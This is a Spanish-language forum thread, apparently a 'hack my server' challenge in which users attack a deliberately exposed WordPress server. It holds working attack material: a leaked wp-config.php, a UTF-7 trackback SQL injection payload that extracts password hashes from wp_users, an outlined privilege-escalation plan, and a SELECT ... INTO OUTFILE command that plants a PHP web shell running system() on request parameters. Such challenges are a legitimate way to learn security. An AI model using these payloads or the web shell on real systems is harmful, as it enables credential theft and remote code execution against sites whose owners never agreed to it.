Hack my server II

[#!drvy]

¿El wp_config.php lo puedes ver usando el infile? :O

Se..

Código (php) [Seleccionar] Expandir

<?php
// ** MySQL settings ** //
define('DB_NAME', 'hackme2');    // The name of th...
define('DB_USER', 'root');     // Your MySQL usern...
define('DB_PASSWORD', ''); // ...and password
define('DB_HOST', 'localhost');    // 99% chance y...

// You can have multiple installations in one data...
$table_prefix  = 'wp_';   // Only numbers, letters...

// Change this to localize WordPress.  A correspon...
// chosen language must be installed to wp-include...
// For example, install de.mo to wp-includes/langu...
// to enable German language support.
define ('WPLANG', '');

/* That's all, stop editing! Happy blogging. */

define('ABSPATH', dirname(__FILE__).'/');
require_once(ABSPATH.'wp-settings.php');
?>

Saludos

[#!drvy]

@MinusFour como conseguiste ejecutar PHP ?

Saludos

[WHK]

aca va la inyeccion sql que estoy probando:

Código [Seleccionar] Expandir

charset=UTF-7&title= -- a&url= -- a&excerpt= -- a&blog_name=a%2bACc-) union select user_pass from wp_users limit 1 -- -

Funciona para el select pero para el insert da error, hay que intentar provocar un error forzado como un cast a la columna para que arroje el hash del admin y desde ahi loguear y hacer el directory traversal y comenzar a elevar y ejecutar código. Recuerden que como admin pueden ejecutar código editando una plantilla a pesar de que esta no se guarde con la previsualización, aparte de la ejecución de código en varis archivos extras y desde ahi intentar ejecutar un system y desde ahi elevar privilegios escaneando archivos con permisos de root que puedan ser sobreescribibles (igual como lo hace la c99 shell).

Debo irme a mi casa, adios.

[MinusFour]

@MinusFour como conseguiste ejecutar PHP ?

Saludos

No lo he podido lograr todavía, por alguna razón no escapa las comillas xD.

Pero está esto:

http://blog.sjinks.pro/wordpress/858-information-disclosure-via-sql-injection-attack/

Por cierto WHK te dejaste la IP en tus logs.

Edit: Noup, por más que lo intento las comillas las escapan y las imprimen, así que me imagino que esa vulnerabilidad no puede ejecutar código php.

[dimitrix]

Carpeta con permisos de escritura, lista!

[WIитX]

aca va la inyeccion sql que estoy probando:

Código [Seleccionar] Expandir

charset=UTF-7&title= -- a&url= -- a&excerpt= -- a&blog_name=a%2bACc-) union select user_pass from wp_users limit 1 -- -

Funciona para el select pero para el insert da error, hay que intentar provocar un error forzado como un cast a la columna para que arroje el hash del admin y desde ahi loguear y hacer el directory traversal y comenzar a elevar y ejecutar código. Recuerden que como admin pueden ejecutar código editando una plantilla a pesar de que esta no se guarde con la previsualización, aparte de la ejecución de código en varis archivos extras y desde ahi intentar ejecutar un system y desde ahi elevar privilegios escaneando archivos con permisos de root que puedan ser sobreescribibles (igual como lo hace la c99 shell).

Debo irme a mi casa, adios.

Que asco dais D: iros de aquí eso no vale ABUSONES!!  

[MinusFour]

Carpeta con permisos de escritura, lista!

¿Entonces ahora podemos escribir en /var/www?

¿No quieres poner una carpeta de uploads con permisos de escritura o cambiar la carpeta de themes y dejarla como de escritura?

[dimitrix]

¿Entonces ahora podemos escribir en /var/www?

¿No quieres poner una carpeta de uploads con permisos de escritura o cambiar la carpeta de themes y dejarla como de escritura

No. Sólo la carpeta uploads de WP...

[xustyx]

Ya he copiado un un acceso a la shell

-> c.php?cmd=

SELECT '<?php if(isset($_REQUEST[\"cmd\"])){ $cmd = ($_REQUEST[\"cmd\"]);system($cmd);die;}?>'
INTO OUTFILE  '/var/www/wp-content/uploads/c.php'

[dimitrix]

Como subiste la Shell? :-)